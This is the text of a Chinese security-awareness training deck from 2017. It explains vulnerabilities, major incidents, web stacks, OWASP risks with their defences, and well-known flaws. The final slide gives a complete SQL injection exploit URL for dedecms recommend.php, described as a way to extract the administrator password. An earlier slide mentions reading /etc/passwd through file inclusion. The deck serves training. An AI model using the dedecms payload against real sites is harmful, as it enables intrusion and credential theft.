2018渠道售前安全初级认证_安全基础-安全知识培训PPT幻灯片课件

,Sept.,2017,安全知识培训,1,2,安全常识,3,安全常识,什么是漏洞安全漏洞是信息系统在生命周期的各个阶段（设计、实现、运维等过程）中产生的某类问题，这些问题会对系统的安全（机密性、完整性、可用性）产生影响。,漏洞与Bug并不等同，他们之间的关系基本可以描述为：大部分的Bug影响功能性，并不涉及安全性，也就不构成漏洞；大部分的漏洞来源于Bug，但并不是全部，它们之间只是有一个很大的交集。,4,安全常识,什么是攻击利用网络存在的漏洞和安全缺陷对网络系统的硬件、软件及其系统中的数据进行的攻击。包括主动攻击：篡改、伪造消息数据和拒绝服务攻击（DDOS）等，被动攻击：流量分析、窃听等什么是入侵网络入侵（hacking）通常是指具有熟练地编写和调试计算机程序的技巧，并使用这些技巧来获得非法或未授权的网络或文件访问，入侵进入公司内部网的行为区别入侵是指任何威胁和破坏系统资源的行为，攻击是入侵者为进行入侵所采取的技术手段和方法。,5,安全术语,后门绕过安全控制而获取对程序或系统访问权的方法。后门的最主要目的就是方便以后再次秘密进入或者控制系统。webshellwebshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称作为一种网页后门。,6,安全术语,0day漏洞通常是指还没有补丁的漏洞。也就是说官方还没有发现或者是发现了还没有开发出安全补丁的漏洞exploit简称exp，漏洞利用,7,安全术语,提权提高自己在服务器中的权限，主要针对网站入侵过程中，当入侵某一网站时，通过各种漏洞提升WEBSHELL权限以夺得该服务器权限。跳板跳板，简单来说，就是为了隐藏自己的地址，让别人无法查找到自己的位置。,8,安全术语,拖库网站遭到入侵后，黑客窃取其数据库。社会工程学一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段取得自身利益的手法，已成迅速上升甚至滥用的趋势。Apt攻击高级持续性威胁。利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式,9,安全事件举例,信息泄露事件1、快递公司官网遭入侵泄露1400万用户快递数据2014年8月12日，警方破获了一起信息泄露案件，犯罪嫌疑人通过快递公司官网漏洞，登录网站后台，然后再通过上传(后门)工具就能获取该网站数据库的访问权限，获取了1400万条用户信息，除了有快递编码外，还详细记录着收货和发货双方的姓名、电话号码、住址等个人隐私信息。2、机锋网2700万用户数据泄露2015年1月5日上午，知名微博账号“互联网的那点事”发布消息称，机锋论坛2300万用户数据泄露，包含用户名、邮箱、加密密码在内的用户信息在网上疯传，提醒用户抓紧修改密码。,10,安全事件举例,信息泄露事件3、小米800万用户数据泄露4、130万考研用户信息被泄露5、智联招聘86万条求职简历数据遭泄露6、12306网站超13万用户数据遭泄露7、汉庭2000万开房记录遭泄露,11,安全事件举例,信息泄露事件,12,安全事件举例,DDOS2017年1月至6月，游戏行业大于300G以上的攻击超过1800次，最大峰值为608G；游戏公司每月平均被攻击次数为800余次。在2017年1月至3月为攻击最猖獗的时期，平均每天有30多次攻击。而在攻击源方面，94%的攻击源都位于国内，6%的攻击源来自国外。,13,安全事件举例,病毒木马事件WannacryWannaCry（又叫WannaDecryptor），一种“蠕虫式”的勒索病毒软件，由不法分子利用NSA（NationalSecurityAgency，美国国家安全局）泄露的危险漏洞“EternalBlue”（永恒之蓝）进行传播。最新统计数据显示，100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。勒索病毒是自熊猫烧香以来影响力最大的病毒之一。WannaCry勒索病毒全球大爆发，至少150个国家、30万名用户中招，造成损失达80亿美元，已经影响到金融，能源，医疗等众多行业，造成严重的危机管理问题。中国部分Windows操作系统用户遭受感染，校园网用户首当其冲，受害严重，大量实验室数据和毕业设计被锁定加密。部分大型企业的应用系统和数据库文件被加密后，无法正常工作，影响巨大。,14,安全事件举例,病毒木马事件PetyaPetya是2017年3月出现的一种变体勒索软件，是一种类似于“WannaCry”的新勒索病毒，它的破坏性比传统的勒索软件更大，现已导致俄罗斯石油公司(RosneftPJSC)和丹麦A.P.穆勒-马士基有限公司等在内的多家大型企业被攻击，而且乌克兰的政府系统也遭到了该病毒的袭击。并已确认有国内企业中招。腾讯电脑管家称已确认病毒样本通过永恒之蓝漏洞传播。北京时间2017年6月27日晚，乌克兰、俄罗斯、印度、西班牙、法国、英国以及欧洲多国正在遭遇Petya类勒索病毒袭击，政府、银行、电力系统、通讯系统、企业以及机场都不同程度地受到了影响。,15,安全事件举例,病毒木马事件暗云III“暗云”是目前已知复杂度最高、感染用户数量最大的木马之一。通过复杂、新颖的技术，“暗云”可长期潜伏在用户的计算机系统中。中毒用户会成为受控“肉鸡”，作为DDoS网络攻击的源头，并导致网络变卡、用户信息被窃取等安全问题。有全网普查显示，该木马已感染了数以百万的计算机。,16,Web构成,17,web应用工作原理,静态网页：html或者htm，是一种静态的页面格式，不需要服务器解析其中的脚本。由浏览器如(IE、Chrome等)解析。1.不依赖数据库2.灵活性差，制作、更新、维护麻烦3.交互性交差，在功能方面有较大的限制4.安全，不存在SQL注入漏洞动态网页：asp、aspx、php、jsp等，由相应的脚本引擎来解释执行，根据指令生成静态网页。1.依赖数据库2.灵活性好，维护简便3.交互性好，功能强大4.存在安全风险，可能存在SQL注入漏洞,18,web应用工作原理,正常用户访问网页的具体流程如下图：,19,漏洞利用流程,黑客攻击网站（sql注入）的具体流程如下图：,20,服务器,Windows代表：Windows2003、Windows2008、常见漏洞：“永恒之蓝”（MS17-010），MS08-067(比较古老但很经典的漏洞)Linux代表Ubuntu、Centos、Redhat常见漏洞：脏牛漏洞、sudo漏洞,21,web服务器,Web服务器也称为HTTP服务器，它是响应来自浏览器的HTTP请求，并且发送出网页文件的软件。当访问者在浏览器的地址文本框中输入一个URL，或者单击在浏览器中打开的网页上的某个链接时，便生成一个网页请求。常见的web服务器：IIS、Apache、Nginx、tomcat、weblogic.,22,web服务器,IISIIS（Internet信息服务器）是InternetInformationServices的缩写，是微软提供的Internet服务器软件，包括WEB、FTP、SMTP等服务器组件。常见漏洞：IIS短文件泄露、IIS解析漏洞、IIS6.0远程代码执行ApacheApache是Apache软件基金会的一个开放源码的网页服务器，世界使用排名第一的Web服务器软件常见漏洞：apache解析漏洞、Apache日志文件漏洞,23,web服务器,NginxNginx是一个高性能的HTTP和反向代理服务器，也是一个IMAP/POP3/SMTP服务器。常见漏洞：Nginx解析漏洞、整数溢出漏洞TomcatTomcat服务器是一个免费的开放源代码的Web应用服务器，属于轻量级应用服务器，在中小型系统和并发访问用户不是很多的场合下被普遍使用，是开发和调试JSP程序的首选。常见漏洞：tomcat弱口令、tomcat远程代码执行、本地提权,24,web服务器,WeblogicWeblogic是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。常见漏洞：java反序列化、SSRF(服务器端请求伪造),25,数据库,数据库数据库是按照数据结构来组织、存储和管理数据的“仓库”。结构化查询语言结构化查询语言(StructuredQueryLanguage)简称SQL，结构化查询语言是一种数据库查询和程序设计语言，用于存取数据以及查询、更新和管理关系数据库系统。数据库分类MySQL、MSSQL、Access、Oracle、Sqlite数据库管理软件Phpmyadmin、navicat,26,开发语言及常见框架/cms,PHP开发框架：CodeIgniter、ThinkPHPcms(内容管理系统):phpcms、dedecms、qibocms.ASPcms:aspcms、动易cms、南方数据.NETcms:SiteServerJSP开发框架：struts2、SpringMVCcms:jeecms、大汉cms,27,web常见架构,LAMPLinux+Apache+MySQL+PHP适用于大型网站架构，稳定性高，常见于企业网站WAMPWindows+Apache+MySQL+PHP适用于中小型网站架构，易于管理，常见于教育（大学等）、政府事业单位（常用phpcms作为网站cms）,28,web常见架构,其他常见组合：PHP+IIS（IIS常和asp和aspx搭配）部分网站可能会使用这种架构，但是偏少ASP+IIS常见于学校，政府（地方）等单位.NET+IIS（aspx）常见于学校（比如正方教务系统），政府，医院等，部分企业网站也会使用这种架构JSP+Tomcat金融、政府（大型，一般市级以上会是jsp的）,大学主站,29,常见漏洞,30,常见漏洞,A1-注入,A3-跨站脚本（XSS）,A4-不安全的直接对象引用,A5-安全配置错误,A6-敏感信息泄露,A7-功能级访问控制缺失,A8-跨站请求伪造（CSRF）,A9-使用含有已知漏洞的组件,A10-未验证的重定向和转发,A2-失效的身份认证和会话管理,31,SQL注入危害,这些危害包括但不局限于：数据库信息泄漏：数据库中存放的用户的隐私信息的泄露。网页篡改：通过操作数据库对特定网页进行篡改。网站被挂马，传播恶意软件：修改数据库一些字段的值，嵌入网马链接，进行挂马攻击。数据库被恶意操作：数据库服务器被攻击，数据库的系统管理员帐户被窜改。服务器被远程控制，被安装后门。经由数据库服务器提供的操作系统支持，让黑客得以修改或控制操作系统。破坏硬盘数据，瘫痪全系统。一些类型的数据库系统能够让SQL指令操作文件系统，这使得SQL注入的危害被进一步放大。,32,SQL注入,sql注入攻击漏洞，攻击者把不可信的数据作为命令或者查询语句的一部分，发送给解释器的，以执行计划外的命令或者在未被恰当授权时访问数据。,举个例子:网站后台代码的sql语句构建如下$sql=“select*fromuserwhereid=$id”正常的url如下,33,SQL注入直观效果,SqlmapSQL注入爆出数据库表名,34,SQL注入的防御,过滤特殊字符：单引号、双引号、斜杠、反斜杠、冒号、空字符等的字符过滤的对象:用户的输入提交的URL请求中的参数部分从cookie中得到的数据部署防SQL注入系统或脚本,35,跨站脚本（XSS）的危害,网络钓鱼，包括盗取各类用户账号窃取用户cookie资料，从而获取用户隐私信息，或利用用户身份进一步对网站执行操作劫持用户（浏览器）会话，从而执行任意操作，例如进行非法转账，强制发表日志，发送电子邮件等强制弹出广告页面，刷流量等网页挂马进行恶意操作，例如任意篡改页面信息，删除文章等进行大量的客户端攻击，如DDOS攻击获取客户端信息，例如用户的浏览历史，真实ip，开放端口等控制受害者机器向其他网站发起攻击结合其他漏洞进一步扩大攻击提升用户权限，包括进一步渗透网站传播XSS跨站脚本蠕虫等。,36,跨站脚本（XSS）,当应用程序收到含有不可信的数据，在没有进行适当的验证和转义的情况下，就将它发送给一个网页浏览器，这就会产生跨站脚本攻击（简称XSS）。,举个例子后台代码如下:访问正常url如下,37,跨站脚本（XSS）直观效果,通过xss漏洞劫持cookie，劫持后台会话。,38,跨站脚本（XSS）的防御,输入与输出中的过滤黑名单与白名单WEB安全编码规范HttpOnlycookie,39,WEBSHELL,webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会上传webshell，得到一个命令执行环境，以达到控制网站服务器的目的。,WEBSHELL的危害:拿到了网站的WebShell，就可以修改网站的文件了！比如下载文件，修改文件，删除文件等，将变得非常容易。拿到WebShell权限后，如果磁盘做了安全设置以及站点独立权限设置，则这个WebShell可能只能对当前站点有效，无法操作其他网站的程序。如果入侵者通过执行命令，提升网站的权限后，就可以发展到入侵服务器，进而创建管理用户，达到控制整台服务器的目的。,40,WEBSHELL,一句话webshell,大马webshell,41,跨站请求伪造(CSRF),跨站请求伪造，也叫CSRF。该攻击让登录用户的浏览器将伪造的HTTP请求，包括该用户的会话cookie和其他认证信息，发送到一个存在CSRF漏洞的web应用程序，该web程序将会收集这些请求。,下面将演示通过CSRF漏洞在用户不知情的情况下修改用户的密码的例子。,也可以这么理解CSRF攻击：攻击者盗用了你的身份，以你的名义进行某些非法操作。CSRF能够使用你的账户发送邮件，获取你的敏感信息，甚至盗走你的财产等。,42,CSRF攻击原理概要,WebA为存在CSRF漏洞WebB为攻击者的恶意网站UserC为WebA的用户正常情况下:A网站修改密码的请求是,1.用户C打开浏览器，访问受信任网站A，输入用户名和密码请求登录网站A；2.在用户信息通过验证后，网站A产生Cookie信息并返回给浏览器，此时用户登录网站A成功；3.用户未退出网站A的情况下，在同一浏览器中访问网站B；4.网站B中的js代码要求浏览器对A网站发起一个,提交该请求后，密码修改为newpass。,43,CSRF的防御,验证HTTPReferer字段Token验证添加验证码,44,系统命令注入的危害,导致攻击者执行任意系统命令，控制主机权限。,注入系统命令查看系统用户。,45,系统命令注入,系统命令注入和sql注入类似。不同点是sql注入注入的是sql语句，系统命令注入注入的是系统命令。前者导致执行任意sql语句，后者导致执行任意系统命令。,举个例子后台代码如下正常请求,46,系统命令注入的防御,尽量不要使用系统命令在进入执行命令函数/方法之前，变量一定要做好过滤，对敏感字符转义在使用动态函数之前，确保使用的函数是指定的函数之一,47,文件包含的危害,1读取敏感信息文件。Windows/system.ini或者是/etc/passwd等2远程包含webshell。3本地包含配合文件上传getshell。,48,文件包含,开发人员通常会把可重复使用的函数写到单个文件中，在使用某些函数时，直接调用此文件，而无须再次编写，这种调用文件的过程被称为包含。文件包含漏洞的产生原因是在通过引入文件时，由于传入的文件名没有经过合理的校验，或者校检被绕过，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。,举个例子后台语言如下：正常url如下：,49,文件包含的防御,1.严格判断包含中的参数是否外部可控，因为文件包含漏洞利用成功与否的关键点就在于被包含文件是否可以被外部控制。2.路径限制：限制被包含的文件只能在某一文件夹内，禁止目录跳转字符，如：“./”。3.包含文件验证：验证被包含的文件是否是白名单中的一员。4.尽量不要使用动态包含，可以在需要包含的页面固定写好，如：include(“test.php”);。,50,目录遍历,目录遍历是Http所存在的一个安全漏洞，它使得攻击者能够访问受限制的目录。,目录遍历的形成原因一般是http服务器的错误配置导致的。,危害:1：读取敏感配置文件信息。(数据库文件等)2：可能造成源码文件泄露(一些管理员可能整站打包成zip),51,目录遍历,防御方法:正确配置服务器，对目录做访问控制。,52,信息泄露攻击,信息泄露通常是由于服务器配置不当，或者是web应用程序编写不当，导致的泄露敏感信息。通常，扫描器可以轻易扫描出信息泄露。,Svn源码泄露,Phpinfo信息泄露,53,越权,越权漏洞是逻辑漏洞的一种。它使用户能执行一些本不该属于自己的操作权限。逻辑漏洞不像SQL注入，XSS跨站脚本等漏洞有明显的标识，自动化扫描器可以针对规则来识别出这些漏洞，而逻辑漏洞一般出现在功能（业务流程）上，因此这是漏洞扫描工具无法去识别的。,越权一般可以分为以下两种。水平越权：相同级别用户之前的越权操作(例如查看其它用户账单)垂直越权：不同级别之间或不同角色之间的越权操作(user权限越权admin权限),举个水平越权的例子。,54,越权实例,这是某系统的一处越权实例。url格式如下,55,越权的防御,完善代码逻辑：1结合session认证，当用户发起对一个数据资源的请求时，根据session中的用户id联合查询，倘若这个资源不属于这个用户，则不予查询。2针对水平越权，可以增加资源唯一标识符的复杂度，可以将其变成几十位无规律的字符串，增加水平越权的难度。但是该方法理论上仍然能被暴力破解。,56,常见0day攻击,57,什么是0day,0day漏洞通常是指还没有补丁的漏洞。也就是说官方还没有发现或者是发现了还没有开发出安全补丁的漏洞0day攻击利用0day漏洞进行的攻击，特点是利用简单，危害较大,58,常见0daystruts2,Struts2框架存在漏洞，平时说的存在struts2漏洞是指的远程命令/代码执行漏洞影响范围2017年3月份报告：,59,常见0daystruts2,Struts2漏洞有很多，比较著名的几个远程命令/代码执行漏洞：,60,常见0daystruts2,利用该漏洞可执行任意操作，例如上传shell，添加管理员账号等，下图我们展示的是查询os版本信息，以证明漏洞存在,61,常见0dayjava反序列化,Java序列化把Java对象转换为字节序列的过程便于保存在内存、文件、数据库中，ObjectOutputStream类的writeObject()方法可以实现序列化。Java反序列化把字节序列恢复为Java对象的过程，ObjectInputStream类的readObject()方法用于反序列化。影响范围WebLogic、WebSphere、JBoss、Jenkins、OpenNMS这些大名鼎鼎的Java应用，都受到影响危害导致远程代码执行，获取服务器权限,62,常见0dayjava反序列化,直接部署一个webshell，利用非常简单,63,常见0daybash破壳漏洞,Bash漏洞bash漏洞源于在调用BashShell之前可以用构造的值创建环境变量。由于没有对输入的环境变量进行检测，攻击者可以在输入的变量时候可以包含恶意代码，在Shell被调用后会被立即执行。影响范围影响目前主流的操作系统平台，包括但不限于Redhat、CentOS、Ubuntu、Debian、Fedora、AmazonLinux、OSX10.10等平台危害黑客利用该漏洞，可以执行任意代码，甚至可以不需要经过认证，就能远程取得系统的控制权，包括执行恶意程序，或在系统内植入木马，或获取敏感信息。,64,常见0day心脏滴血漏洞,心脏滴血漏洞（OpenSSL心脏滴血漏洞）未能正确检测用户输入参数的长度，攻击者可以利用该漏洞，远程读取存在漏洞版本的OpenSSL服务器内存中64K的数据，获取内存中的用户名、密码、个人相关信息以及服务器的证书等私密信息。影响范围该漏洞披露时，约有17%（大约五十万）通过认证机构认证的互联网安全网络服务器容易受到攻击危害通过多个测试实例表明，根据对应OpenSSL服务器承载业务类型，攻击者一般可获得用户X.509证书私钥、实时连接的用户账号密码、会话Cookies等敏感信息，进一步可直接取得相关用户权限，窃取私密数据或执行非授权操作。,65,常见0day永恒之蓝,永恒之蓝（英语：EternalBlue）美国国家安全局（NSA）开发的漏洞利用程序，于2017年4月14日被黑客组织影子掮客泄漏。Wannacry传播利用的是windows的smb漏洞，漏洞补丁是MS17-010影响范围大多数windows系统都受到影响（已有相关补丁）危害获取服务器权限,66,常见0daysamba漏洞,linux版“永恒之蓝”，CVE-2017-7494差异Windows的SMB服务默认开启，Samba在大多数的Linux发行版中需要手动开启影响范围漏洞影响Samba3.5.0及3.5.0和4.6.4之间的任意版本（不包括4.5.10、4.4.14、4.6.4）。危害可直接获取服务器shell,67,常见0daysamba漏洞,如图，该漏洞利用模块已集成到了metasploit当中,无需交互即可利用，该图片展示的是已获取到服务器shell，可以对服务器进行任何操作,68,常见0daydedecms,Dedecms,织梦内容管理系统recommend.php存在sql注入利用EXP：http:/url/plus/recommend.php?action=&aid=1&_FILEStypetmp_name=%27%20or%20mid=%27%20/*!50000union*/*!50000select*/1,2,3,(select%20CONCAT(0 x7c,userid,0 x7c,pwd)+from+%23_admin%20limit+0,1),5,6,7,8,9%23&_FILEStypename=1.jpg&_FILEStypetype=application/octet-stream&_FILEStypesize=4294危害：上述exp可获取管理员密码